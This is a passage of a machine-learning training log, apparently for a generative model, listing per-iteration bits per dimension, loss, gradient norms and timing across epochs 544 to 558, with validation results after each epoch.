Bit/dim 1.0707(1.0742) | Xent 0.0000(0.0000) | Loss 1.0707(1.0742) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.1417(0.0936) | Total Time 10.00(10.00)\nIter 5779 | Time 42.6128(40.7771) | Bit/dim 1.0781(1.0743) | Xent 0.0000(0.0000) | Loss 1.0781(1.0743) | Error 0.0000(0.0000) Steps 446(449.66) | Grad Norm 0.0604(0.0926) | Total Time 10.00(10.00)\nIter 5780 | Time 40.4521(40.7674) | Bit/dim 1.0764(1.0743) | Xent 0.0000(0.0000) | Loss 1.0764(1.0743) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.0589(0.0916) | Total Time 10.00(10.00)\nIter 5781 | Time 40.2465(40.7518) | Bit/dim 1.0748(1.0744) | Xent 0.0000(0.0000) | Loss 1.0748(1.0744) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.1452(0.0932) | Total Time 10.00(10.00)\nIter 5782 | Time 42.2249(40.7960) | Bit/dim 1.0711(1.0743) | Xent 0.0000(0.0000) | Loss 1.0711(1.0743) | Error 0.0000(0.0000) Steps 452(449.87) | Grad Norm 0.1287(0.0942) | Total Time 10.00(10.00)\nIter 5783 | Time 42.4821(40.8465) | Bit/dim 1.0745(1.0743) | Xent 0.0000(0.0000) | Loss 1.0745(1.0743) | Error 0.0000(0.0000) Steps 452(449.93) | Grad Norm 0.0731(0.0936) | Total Time 10.00(10.00)\nIter 5784 | Time 41.8102(40.8754) | Bit/dim 1.0715(1.0742) | Xent 0.0000(0.0000) | Loss 1.0715(1.0742) | Error 0.0000(0.0000) Steps 446(449.81) | Grad Norm 0.0782(0.0931) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0544 | Time 15.1077, Epoch Time 318.4499(311.8876), Bit/dim 1.0696(best: 1.0684), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5785 | Time 41.1194(40.8828) | Bit/dim 1.0773(1.0743) | Xent 0.0000(0.0000) | Loss 1.0773(1.0743) | Error 0.0000(0.0000) Steps 446(449.70) | Grad Norm 0.1751(0.0956) | Total Time 10.00(10.00)\nIter 5786 | Time 39.7239(40.8480) | Bit/dim 1.0756(1.0743) | Xent 0.0000(0.0000) | Loss 1.0756(1.0743) | Error 0.0000(0.0000) Steps 446(449.59) | Grad Norm 0.0804(0.0952) | Total Time 10.00(10.00)\nIter 5787 | Time 40.6914(40.8433) | Bit/dim 1.0753(1.0743) | Xent 0.0000(0.0000) | Loss 1.0753(1.0743) | Error 0.0000(0.0000) Steps 452(449.66) | Grad Norm 0.0661(0.0943) | Total Time 10.00(10.00)\nIter 5788 | Time 42.8710(40.9041) | Bit/dim 1.0750(1.0744) | Xent 0.0000(0.0000) | Loss 1.0750(1.0744) | Error 0.0000(0.0000) Steps 446(449.55) | Grad Norm 0.1182(0.0950) | Total Time 10.00(10.00)\nIter 5789 | Time 42.0396(40.9382) | Bit/dim 1.0727(1.0743) | Xent 0.0000(0.0000) | Loss 1.0727(1.0743) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0933(0.0949) | Total Time 10.00(10.00)\nIter 5790 | Time 41.2989(40.9490) | Bit/dim 1.0714(1.0742) | Xent 0.0000(0.0000) | Loss 1.0714(1.0742) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0631(0.0940) | Total Time 10.00(10.00)\nIter 5791 | Time 40.0505(40.9221) | Bit/dim 1.0751(1.0743) | Xent 0.0000(0.0000) | Loss 1.0751(1.0743) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.1176(0.0947) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0545 | Time 15.3664, Epoch Time 315.5962(311.9989), Bit/dim 1.0692(best: 1.0684), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5792 | Time 40.6560(40.9141) | Bit/dim 1.0740(1.0742) | Xent 0.0000(0.0000) | Loss 1.0740(1.0742) | Error 0.0000(0.0000) Steps 452(449.49) | Grad Norm 0.0507(0.0934) | Total Time 10.00(10.00)\nIter 5793 | Time 40.5851(40.9042) | Bit/dim 1.0747(1.0743) | Xent 0.0000(0.0000) | Loss 1.0747(1.0743) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0852(0.0931) | Total Time 10.00(10.00)\nIter 5794 | Time 40.9930(40.9069) | Bit/dim 1.0750(1.0743) | Xent 0.0000(0.0000) | Loss 1.0750(1.0743) | Error 0.0000(0.0000) Steps 446(449.46) | Grad Norm 0.0568(0.0920) | Total Time 10.00(10.00)\nIter 5795 | Time 39.0869(40.8523) | Bit/dim 1.0700(1.0742) | Xent 0.0000(0.0000) | Loss 1.0700(1.0742) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.0908(0.0920) | Total Time 10.00(10.00)\nIter 5796 | Time 40.4318(40.8397) | Bit/dim 1.0708(1.0741) | Xent 0.0000(0.0000) | Loss 1.0708(1.0741) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.0730(0.0914) | Total Time 10.00(10.00)\nIter 5797 | Time 40.5162(40.8300) | Bit/dim 1.0766(1.0741) | Xent 0.0000(0.0000) | Loss 1.0766(1.0741) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.0722(0.0909) | Total Time 10.00(10.00)\nIter 5798 | Time 40.6429(40.8243) | Bit/dim 1.0737(1.0741) | Xent 0.0000(0.0000) | Loss 1.0737(1.0741) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0847(0.0907) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0546 | Time 15.2672, Epoch Time 311.0063(311.9691), Bit/dim 1.0690(best: 1.0684), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5799 | Time 38.8530(40.7652) | Bit/dim 1.0802(1.0743) | Xent 0.0000(0.0000) | Loss 1.0802(1.0743) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0946(0.0908) | Total Time 10.00(10.00)\nIter 5800 | Time 40.6764(40.7625) | Bit/dim 1.0743(1.0743) | Xent 0.0000(0.0000) | Loss 1.0743(1.0743) | Error 0.0000(0.0000) Steps 446(449.22) | Grad Norm 0.0576(0.0898) | Total Time 10.00(10.00)\nIter 5801 | Time 40.7695(40.7628) | Bit/dim 1.0778(1.0744) | Xent 0.0000(0.0000) | Loss 1.0778(1.0744) | Error 0.0000(0.0000) Steps 458(449.49) | Grad Norm 0.0635(0.0890) | Total Time 10.00(10.00)\nIter 5802 | Time 40.6674(40.7599) | Bit/dim 1.0774(1.0745) | Xent 0.0000(0.0000) | Loss 1.0774(1.0745) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0677(0.0884) | Total Time 10.00(10.00)\nIter 5803 | Time 41.9698(40.7962) | Bit/dim 1.0687(1.0743) | Xent 0.0000(0.0000) | Loss 1.0687(1.0743) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0584(0.0875) | Total Time 10.00(10.00)\nIter 5804 | Time 41.8678(40.8283) | Bit/dim 1.0709(1.0742) | Xent 0.0000(0.0000) | Loss 1.0709(1.0742) | Error 0.0000(0.0000) Steps 446(449.53) | Grad Norm 0.0603(0.0867) | Total Time 10.00(10.00)\nIter 5805 | Time 41.0912(40.8362) | Bit/dim 1.0690(1.0741) | Xent 0.0000(0.0000) | Loss 1.0690(1.0741) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.0694(0.0861) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0547 | Time 14.9700, Epoch Time 313.4291(312.0129), Bit/dim 1.0684(best: 1.0684), Xent 0.0000, Loss 1.0684, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5806 | Time 40.9615(40.8400) | Bit/dim 1.0764(1.0741) | Xent 0.0000(0.0000) | Loss 1.0764(1.0741) | Error 0.0000(0.0000) Steps 446(449.49) | Grad Norm 0.0653(0.0855) | Total Time 10.00(10.00)\nIter 5807 | Time 41.2457(40.8522) | Bit/dim 1.0708(1.0740) | Xent 0.0000(0.0000) | Loss 1.0708(1.0740) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0620(0.0848) | Total Time 10.00(10.00)\nIter 5808 | Time 39.8205(40.8212) | Bit/dim 1.0708(1.0739) | Xent 0.0000(0.0000) | Loss 1.0708(1.0739) | Error 0.0000(0.0000) Steps 452(449.64) | Grad Norm 0.0632(0.0842) | Total Time 10.00(10.00)\nIter 5809 | Time 39.2704(40.7747) | Bit/dim 1.0775(1.0740) | Xent 0.0000(0.0000) | Loss 1.0775(1.0740) | Error 0.0000(0.0000) Steps 452(449.71) | Grad Norm 0.0721(0.0838) | Total Time 10.00(10.00)\nIter 5810 | Time 39.9673(40.7505) | Bit/dim 1.0733(1.0740) | Xent 0.0000(0.0000) | Loss 1.0733(1.0740) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.0808(0.0837) | Total Time 10.00(10.00)\nIter 5811 | Time 41.2429(40.7652) | Bit/dim 1.0747(1.0740) | Xent 0.0000(0.0000) | Loss 1.0747(1.0740) | Error 0.0000(0.0000) Steps 446(449.67) | Grad Norm 0.0609(0.0830) | Total Time 10.00(10.00)\nIter 5812 | Time 40.2485(40.7497) | Bit/dim 1.0726(1.0740) | Xent 0.0000(0.0000) | Loss 1.0726(1.0740) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0625(0.0824) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0548 | Time 15.0060, Epoch Time 310.3326(311.9625), Bit/dim 1.0688(best: 1.0684), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5813 | Time 39.8633(40.7231) | Bit/dim 1.0750(1.0740) | Xent 0.0000(0.0000) | Loss 1.0750(1.0740) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0605(0.0817) | Total Time 10.00(10.00)\nIter 5814 | Time 40.8356(40.7265) | Bit/dim 1.0697(1.0739) | Xent 0.0000(0.0000) | Loss 1.0697(1.0739) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0596(0.0811) | Total Time 10.00(10.00)\nIter 5815 | Time 42.0255(40.7655) | Bit/dim 1.0739(1.0739) | Xent 0.0000(0.0000) | Loss 1.0739(1.0739) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.0691(0.0807) | Total Time 10.00(10.00)\nIter 5816 | Time 43.8371(40.8576) | Bit/dim 1.0749(1.0739) | Xent 0.0000(0.0000) | Loss 1.0749(1.0739) | Error 0.0000(0.0000) Steps 452(449.49) | Grad Norm 0.0812(0.0807) | Total Time 10.00(10.00)\nIter 5817 | Time 40.9931(40.8617) | Bit/dim 1.0741(1.0739) | Xent 0.0000(0.0000) | Loss 1.0741(1.0739) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0782(0.0807) | Total Time 10.00(10.00)\nIter 5818 | Time 40.2804(40.8443) | Bit/dim 1.0715(1.0739) | Xent 0.0000(0.0000) | Loss 1.0715(1.0739) | Error 0.0000(0.0000) Steps 452(449.64) | Grad Norm 0.0890(0.0809) | Total Time 10.00(10.00)\nIter 5819 | Time 39.3067(40.7981) | Bit/dim 1.0747(1.0739) | Xent 0.0000(0.0000) | Loss 1.0747(1.0739) | Error 0.0000(0.0000) Steps 446(449.53) | Grad Norm 0.1479(0.0829) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0549 | Time 15.1366, Epoch Time 314.8808(312.0500), Bit/dim 1.0685(best: 1.0684), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5820 | Time 40.5378(40.7903) | Bit/dim 1.0744(1.0739) | Xent 0.0000(0.0000) | Loss 1.0744(1.0739) | Error 0.0000(0.0000) Steps 452(449.61) | Grad Norm 0.1560(0.0851) | Total Time 10.00(10.00)\nIter 5821 | Time 41.3878(40.8082) | Bit/dim 1.0767(1.0740) | Xent 0.0000(0.0000) | Loss 1.0767(1.0740) | Error 0.0000(0.0000) Steps 446(449.50) | Grad Norm 0.0870(0.0852) | Total Time 10.00(10.00)\nIter 5822 | Time 38.9487(40.7525) | Bit/dim 1.0711(1.0739) | Xent 0.0000(0.0000) | Loss 1.0711(1.0739) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.0841(0.0851) | Total Time 10.00(10.00)\nIter 5823 | Time 40.7921(40.7536) | Bit/dim 1.0706(1.0738) | Xent 0.0000(0.0000) | Loss 1.0706(1.0738) | Error 0.0000(0.0000) Steps 452(449.65) | Grad Norm 0.1119(0.0859) | Total Time 10.00(10.00)\nIter 5824 | Time 39.3943(40.7129) | Bit/dim 1.0773(1.0739) | Xent 0.0000(0.0000) | Loss 1.0773(1.0739) | Error 0.0000(0.0000) Steps 452(449.72) | Grad Norm 0.1176(0.0869) | Total Time 10.00(10.00)\nIter 5825 | Time 40.6860(40.7121) | Bit/dim 1.0730(1.0739) | Xent 0.0000(0.0000) | Loss 1.0730(1.0739) | Error 0.0000(0.0000) Steps 446(449.60) | Grad Norm 0.1171(0.0878) | Total Time 10.00(10.00)\nIter 5826 | Time 40.5361(40.7068) | Bit/dim 1.0786(1.0740) | Xent 0.0000(0.0000) | Loss 1.0786(1.0740) | Error 0.0000(0.0000) Steps 452(449.68) | Grad Norm 0.0565(0.0869) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0550 | Time 15.2524, Epoch Time 310.0053(311.9887), Bit/dim 1.0692(best: 1.0684), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5827 | Time 40.3807(40.6970) | Bit/dim 1.0758(1.0741) | Xent 0.0000(0.0000) | Loss 1.0758(1.0741) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0642(0.0862) | Total Time 10.00(10.00)\nIter 5828 | Time 41.4661(40.7201) | Bit/dim 1.0744(1.0741) | Xent 0.0000(0.0000) | Loss 1.0744(1.0741) | Error 0.0000(0.0000) Steps 452(449.81) | Grad Norm 0.1254(0.0874) | Total Time 10.00(10.00)\nIter 5829 | Time 41.0062(40.7287) | Bit/dim 1.0727(1.0740) | Xent 0.0000(0.0000) | Loss 1.0727(1.0740) | Error 0.0000(0.0000) Steps 446(449.70) | Grad Norm 0.0638(0.0866) | Total Time 10.00(10.00)\nIter 5830 | Time 39.9774(40.7061) | Bit/dim 1.0738(1.0740) | Xent 0.0000(0.0000) | Loss 1.0738(1.0740) | Error 0.0000(0.0000) Steps 452(449.77) | Grad Norm 0.0588(0.0858) | Total Time 10.00(10.00)\nIter 5831 | Time 40.0386(40.6861) | Bit/dim 1.0736(1.0740) | Xent 0.0000(0.0000) | Loss 1.0736(1.0740) | Error 0.0000(0.0000) Steps 452(449.84) | Grad Norm 0.0764(0.0855) | Total Time 10.00(10.00)\nIter 5832 | Time 40.4335(40.6785) | Bit/dim 1.0731(1.0740) | Xent 0.0000(0.0000) | Loss 1.0731(1.0740) | Error 0.0000(0.0000) Steps 446(449.72) | Grad Norm 0.1083(0.0862) | Total Time 10.00(10.00)\nIter 5833 | Time 41.4154(40.7006) | Bit/dim 1.0710(1.0739) | Xent 0.0000(0.0000) | Loss 1.0710(1.0739) | Error 0.0000(0.0000) Steps 452(449.79) | Grad Norm 0.0705(0.0857) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0551 | Time 15.0817, Epoch Time 312.0242(311.9897), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5834 | Time 40.0146(40.6800) | Bit/dim 1.0751(1.0739) | Xent 0.0000(0.0000) | Loss 1.0751(1.0739) | Error 0.0000(0.0000) Steps 452(449.85) | Grad Norm 0.0674(0.0852) | Total Time 10.00(10.00)\nIter 5835 | Time 41.5879(40.7073) | Bit/dim 1.0714(1.0739) | Xent 0.0000(0.0000) | Loss 1.0714(1.0739) | Error 0.0000(0.0000) Steps 452(449.92) | Grad Norm 0.0590(0.0844) | Total Time 10.00(10.00)\nIter 5836 | Time 39.2206(40.6627) | Bit/dim 1.0728(1.0738) | Xent 0.0000(0.0000) | Loss 1.0728(1.0738) | Error 0.0000(0.0000) Steps 452(449.98) | Grad Norm 0.0994(0.0849) | Total Time 10.00(10.00)\nIter 5837 | Time 39.5392(40.6290) | Bit/dim 1.0702(1.0737) | Xent 0.0000(0.0000) | Loss 1.0702(1.0737) | Error 0.0000(0.0000) Steps 446(449.86) | Grad Norm 0.0711(0.0844) | Total Time 10.00(10.00)\nIter 5838 | Time 39.6920(40.6009) | Bit/dim 1.0757(1.0738) | Xent 0.0000(0.0000) | Loss 1.0757(1.0738) | Error 0.0000(0.0000) Steps 446(449.75) | Grad Norm 0.1214(0.0856) | Total Time 10.00(10.00)\nIter 5839 | Time 40.4479(40.5963) | Bit/dim 1.0738(1.0738) | Xent 0.0000(0.0000) | Loss 1.0738(1.0738) | Error 0.0000(0.0000) Steps 446(449.63) | Grad Norm 0.1572(0.0877) | Total Time 10.00(10.00)\nIter 5840 | Time 42.9862(40.6680) | Bit/dim 1.0765(1.0739) | Xent 0.0000(0.0000) | Loss 1.0765(1.0739) | Error 0.0000(0.0000) Steps 446(449.52) | Grad Norm 0.0857(0.0876) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0552 | Time 15.1409, Epoch Time 310.8707(311.9562), Bit/dim 1.0687(best: 1.0684), Xent 0.0000, Loss 1.0687, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5841 | Time 39.7968(40.6418) | Bit/dim 1.0730(1.0738) | Xent 0.0000(0.0000) | Loss 1.0730(1.0738) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.1510(0.0895) | Total Time 10.00(10.00)\nIter 5842 | Time 38.7682(40.5856) | Bit/dim 1.0765(1.0739) | Xent 0.0000(0.0000) | Loss 1.0765(1.0739) | Error 0.0000(0.0000) Steps 452(449.67) | Grad Norm 0.1810(0.0923) | Total Time 10.00(10.00)\nIter 5843 | Time 39.0102(40.5384) | Bit/dim 1.0751(1.0740) | Xent 0.0000(0.0000) | Loss 1.0751(1.0740) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0917(0.0923) | Total Time 10.00(10.00)\nIter 5844 | Time 40.5887(40.5399) | Bit/dim 1.0704(1.0738) | Xent 0.0000(0.0000) | Loss 1.0704(1.0738) | Error 0.0000(0.0000) Steps 446(449.45) | Grad Norm 0.1539(0.0941) | Total Time 10.00(10.00)\nIter 5845 | Time 40.5039(40.5388) | Bit/dim 1.0773(1.0740) | Xent 0.0000(0.0000) | Loss 1.0773(1.0740) | Error 0.0000(0.0000) Steps 452(449.53) | Grad Norm 0.1587(0.0961) | Total Time 10.00(10.00)\nIter 5846 | Time 41.7091(40.5739) | Bit/dim 1.0765(1.0740) | Xent 0.0000(0.0000) | Loss 1.0765(1.0740) | Error 0.0000(0.0000) Steps 452(449.60) | Grad Norm 0.0760(0.0955) | Total Time 10.00(10.00)\nIter 5847 | Time 39.2381(40.5338) | Bit/dim 1.0716(1.0740) | Xent 0.0000(0.0000) | Loss 1.0716(1.0740) | Error 0.0000(0.0000) Steps 446(449.50) | Grad Norm 0.0733(0.0948) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0553 | Time 15.3218, Epoch Time 307.4693(311.8216), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5848 | Time 39.8510(40.5133) | Bit/dim 1.0779(1.0741) | Xent 0.0000(0.0000) | Loss 1.0779(1.0741) | Error 0.0000(0.0000) Steps 458(449.75) | Grad Norm 0.1720(0.0971) | Total Time 10.00(10.00)\nIter 5849 | Time 41.9262(40.5557) | Bit/dim 1.0720(1.0740) | Xent 0.0000(0.0000) | Loss 1.0720(1.0740) | Error 0.0000(0.0000) Steps 452(449.82) | Grad Norm 0.0862(0.0968) | Total Time 10.00(10.00)\nIter 5850 | Time 40.3646(40.5500) | Bit/dim 1.0667(1.0738) | Xent 0.0000(0.0000) | Loss 1.0667(1.0738) | Error 0.0000(0.0000) Steps 458(450.06) | Grad Norm 0.0704(0.0960) | Total Time 10.00(10.00)\nIter 5851 | Time 39.6954(40.5244) | Bit/dim 1.0763(1.0739) | Xent 0.0000(0.0000) | Loss 1.0763(1.0739) | Error 0.0000(0.0000) Steps 446(449.94) | Grad Norm 0.1026(0.0962) | Total Time 10.00(10.00)\nIter 5852 | Time 42.8151(40.5931) | Bit/dim 1.0730(1.0738) | Xent 0.0000(0.0000) | Loss 1.0730(1.0738) | Error 0.0000(0.0000) Steps 446(449.82) | Grad Norm 0.1157(0.0968) | Total Time 10.00(10.00)\nIter 5853 | Time 40.4771(40.5896) | Bit/dim 1.0758(1.0739) | Xent 0.0000(0.0000) | Loss 1.0758(1.0739) | Error 0.0000(0.0000) Steps 452(449.89) | Grad Norm 0.1897(0.0996) | Total Time 10.00(10.00)\nIter 5854 | Time 39.6955(40.5628) | Bit/dim 1.0736(1.0739) | Xent 0.0000(0.0000) | Loss 1.0736(1.0739) | Error 0.0000(0.0000) Steps 446(449.77) | Grad Norm 0.0777(0.0989) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0554 | Time 15.3139, Epoch Time 312.5020(311.8420), Bit/dim 1.0686(best: 1.0684), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5855 | Time 40.8205(40.5705) | Bit/dim 1.0741(1.0739) | Xent 0.0000(0.0000) | Loss 1.0741(1.0739) | Error 0.0000(0.0000) Steps 458(450.02) | Grad Norm 0.1769(0.1012) | Total Time 10.00(10.00)\nIter 5856 | Time 41.9837(40.6129) | Bit/dim 1.0736(1.0739) | Xent 0.0000(0.0000) | Loss 1.0736(1.0739) | Error 0.0000(0.0000) Steps 446(449.90) | Grad Norm 0.1925(0.1040) | Total Time 10.00(10.00)\nIter 5857 | Time 42.3212(40.6642) | Bit/dim 1.0763(1.0740) | Xent 0.0000(0.0000) | Loss 1.0763(1.0740) | Error 0.0000(0.0000) Steps 452(449.96) | Grad Norm 0.0927(0.1036) | Total Time 10.00(10.00)\nIter 5858 | Time 40.1420(40.6485) | Bit/dim 1.0706(1.0739) | Xent 0.0000(0.0000) | Loss 1.0706(1.0739) | Error 0.0000(0.0000) Steps 446(449.84) | Grad Norm 0.1119(0.1039) | Total Time 10.00(10.00)\nIter 5859 | Time 41.5803(40.6764) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.73) | Grad Norm 0.1841(0.1063) | Total Time 10.00(10.00)\nIter 5860 | Time 40.1389(40.6603) | Bit/dim 1.0695(1.0737) | Xent 0.0000(0.0000) | Loss 1.0695(1.0737) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.0646(0.1050) | Total Time 10.00(10.00)\nIter 5861 | Time 41.0756(40.6728) | Bit/dim 1.0794(1.0739) | Xent 0.0000(0.0000) | Loss 1.0794(1.0739) | Error 0.0000(0.0000) Steps 458(450.04) | Grad Norm 0.1273(0.1057) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0555 | Time 15.1468, Epoch Time 315.7869(311.9603), Bit/dim 1.0689(best: 1.0684), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5862 | Time 40.2132(40.6590) | Bit/dim 1.0752(1.0739) | Xent 0.0000(0.0000) | Loss 1.0752(1.0739) | Error 0.0000(0.0000) Steps 446(449.92) | Grad Norm 0.1189(0.1061) | Total Time 10.00(10.00)\nIter 5863 | Time 40.5317(40.6552) | Bit/dim 1.0766(1.0740) | Xent 0.0000(0.0000) | Loss 1.0766(1.0740) | Error 0.0000(0.0000) Steps 446(449.80) | Grad Norm 0.0712(0.1051) | Total Time 10.00(10.00)\nIter 5864 | Time 39.5063(40.6207) | Bit/dim 1.0706(1.0739) | Xent 0.0000(0.0000) | Loss 1.0706(1.0739) | Error 0.0000(0.0000) Steps 446(449.69) | Grad Norm 0.0566(0.1036) | Total Time 10.00(10.00)\nIter 5865 | Time 41.2043(40.6382) | Bit/dim 1.0745(1.0739) | Xent 0.0000(0.0000) | Loss 1.0745(1.0739) | Error 0.0000(0.0000) Steps 452(449.76) | Grad Norm 0.1209(0.1041) | Total Time 10.00(10.00)\nIter 5866 | Time 41.5521(40.6656) | Bit/dim 1.0727(1.0739) | Xent 0.0000(0.0000) | Loss 1.0727(1.0739) | Error 0.0000(0.0000) Steps 452(449.83) | Grad Norm 0.1317(0.1050) | Total Time 10.00(10.00)\nIter 5867 | Time 39.3519(40.6262) | Bit/dim 1.0731(1.0738) | Xent 0.0000(0.0000) | Loss 1.0731(1.0738) | Error 0.0000(0.0000) Steps 446(449.71) | Grad Norm 0.0925(0.1046) | Total Time 10.00(10.00)\nIter 5868 | Time 41.4110(40.6498) | Bit/dim 1.0733(1.0738) | Xent 0.0000(0.0000) | Loss 1.0733(1.0738) | Error 0.0000(0.0000) Steps 452(449.78) | Grad Norm 0.1058(0.1046) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0556 | Time 15.1724, Epoch Time 311.3127(311.9409), Bit/dim 1.0688(best: 1.0684), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5869 | Time 41.2251(40.6670) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.67) | Grad Norm 0.0706(0.1036) | Total Time 10.00(10.00)\nIter 5870 | Time 39.1357(40.6211) | Bit/dim 1.0738(1.0738) | Xent 0.0000(0.0000) | Loss 1.0738(1.0738) | Error 0.0000(0.0000) Steps 446(449.56) | Grad Norm 0.0881(0.1031) | Total Time 10.00(10.00)\nIter 5871 | Time 40.5704(40.6196) | Bit/dim 1.0725(1.0738) | Xent 0.0000(0.0000) | Loss 1.0725(1.0738) | Error 0.0000(0.0000) Steps 452(449.63) | Grad Norm 0.0663(0.1020) | Total Time 10.00(10.00)\nIter 5872 | Time 40.2911(40.6097) | Bit/dim 1.0772(1.0739) | Xent 0.0000(0.0000) | Loss 1.0772(1.0739) | Error 0.0000(0.0000) Steps 452(449.70) | Grad Norm 0.0700(0.1011) | Total Time 10.00(10.00)\nIter 5873 | Time 41.0315(40.6224) | Bit/dim 1.0783(1.0740) | Xent 0.0000(0.0000) | Loss 1.0783(1.0740) | Error 0.0000(0.0000) Steps 452(449.77) | Grad Norm 0.1033(0.1011) | Total Time 10.00(10.00)\nIter 5874 | Time 41.6335(40.6527) | Bit/dim 1.0670(1.0738) | Xent 0.0000(0.0000) | Loss 1.0670(1.0738) | Error 0.0000(0.0000) Steps 446(449.66) | Grad Norm 0.0985(0.1011) | Total Time 10.00(10.00)\nIter 5875 | Time 40.6004(40.6511) | Bit/dim 1.0737(1.0738) | Xent 0.0000(0.0000) | Loss 1.0737(1.0738) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.0523(0.0996) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0557 | Time 15.2105, Epoch Time 312.2674(311.9507), Bit/dim 1.0685(best: 1.0684), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5876 | Time 39.6614(40.6214) | Bit/dim 1.0688(1.0736) | Xent 0.0000(0.0000) | Loss 1.0688(1.0736) | Error 0.0000(0.0000) Steps 452(449.80) | Grad Norm 0.0810(0.0990) | Total Time 10.00(10.00)\nIter 5877 | Time 39.4023(40.5849) | Bit/dim 1.0771(1.0737) | Xent 0.0000(0.0000) | Loss 1.0771(1.0737) | Error 0.0000(0.0000) Steps 446(449.68) | Grad Norm 0.1107(0.0994) | Total Time 10.00(10.00)\nIter 5878 | Time 40.3916(40.5791) | Bit/dim 1.0707(1.0736) | Xent 0.0000(0.0000) | Loss 1.0707(1.0736) | Error 0.0000(0.0000) Steps 452(449.75) | Grad Norm 0.0585(0.0982) | Total Time 10.00(10.00)\nIter 5879 | Time 39.7432(40.5540) | Bit/dim 1.0750(1.0737) | Xent 0.0000(0.0000) | Loss 1.0750(1.0737) | Error 0.0000(0.0000) Steps 446(449.64) | Grad Norm 0.0996(0.0982) | Total Time 10.00(10.00)\nIter 5880 | Time 39.9087(40.5346) | Bit/dim 1.0736(1.0737) | Xent 0.0000(0.0000) | Loss 1.0736(1.0737) | Error 0.0000(0.0000) Steps 452(449.71) | Grad Norm 0.0832(0.0978) | Total Time 10.00(10.00)\nIter 5881 | Time 40.4565(40.5323) | Bit/dim 1.0724(1.0736) | Xent 0.0000(0.0000) | Loss 1.0724(1.0736) | Error 0.0000(0.0000) Steps 446(449.60) | Grad Norm 0.1186(0.0984) | Total Time 10.00(10.00)\nIter 5882 | Time 39.9912(40.5161) | Bit/dim 1.0782(1.0738) | Xent 0.0000(0.0000) | Loss 1.0782(1.0738) | Error 0.0000(0.0000) Steps 446(449.49) | Grad Norm 0.0885(0.0981) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0558 | Time 15.2361, Epoch Time 307.4211(311.8148), Bit/dim 1.0682(best: 1.0684), Xent 0.0000, Loss 1.0682, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 